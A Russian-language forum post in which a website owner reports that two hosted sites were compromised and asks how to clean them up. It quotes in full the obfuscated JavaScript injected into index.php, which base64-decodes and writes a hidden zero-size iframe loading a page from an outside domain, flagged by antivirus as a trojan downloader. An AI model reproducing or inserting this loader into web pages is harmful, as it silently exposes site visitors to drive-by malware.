Добрый день, сегодня 2 моих сайта "упали@? все на одном и том же хостинге, 2 дня назад я заметил на странице index.php я заметил код
?><!-- o65 --><script>function c052f543b7(oe){var
n3='ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=';var w0='';var wb,s0,o7,v7,td,sf,p2;var
q8=0;do{v7=n3.indexOf(oe.charAt(q8++));td=n3.indexOf(oe.charAt(q8++));sf=n3.indexOf(oe.charAt(q8+
+));p2=n3.indexOf(oe.charAt(q8++));wb=(v7<<2)|(td>>4);s0=((td&15)<<4)|(sf>>2);o7=((sf&3)<<6)|p2;if(wb>=192) wb
+=848;else if(wb==168) wb=1025;else if(wb==184) wb=1105;w0+=String.fromCharCode(wb);if(sf!=64){if(s0>=192)
s0+=848;else if(s0==168) s0=1025;else if(s0==184) s0=1105;w0+=String.fromCharCode(s0);}if(p2!=64){if(o7>=192)
o7+=848;else if(o7==168) o7=1025;else if(o7==184) o7=1105;w0+=String.fromCharCode(o7);}}while
(q8<oe.length);document.write(w0);};c052f543b7
('PGlmcmFtZSBzcmM9Imh0dHA6Ly9kaXJla3R2b3J1bi5uZXQva29rb3ZzL3N2Nzc3L2luZGV4LnBocCIgd2lkdGg9MCBoZWlnaHQ9MD48L2lmc
mFtZT4A');</script><!-- c65 -->
Код я удалил, права проверил. успокоился, сегодня у меня эта запись была уже вот всех файлах index.php и оч много index.html
Индексы которые php я вычистил вручную, HTML очень много, копии сайта нет, при входе в админку и на сайт белый экран, ничего нет, куда копать? Что сделать, На втором сайте могу зайти в админку. Код примерно такой же.
KIS ругается на
Доступ запрещен
Запрашиваемый URL-адрес не может быть предоставлен
В запрашиваемом объекте по URL-адресу:
http://бла бла бла
Обнаружена угроза:
объект заражен Trojan-Downloader.JS.Iframe.byo
Про вирус почитал, но пока вычистить не смог. Как быть c чего начать,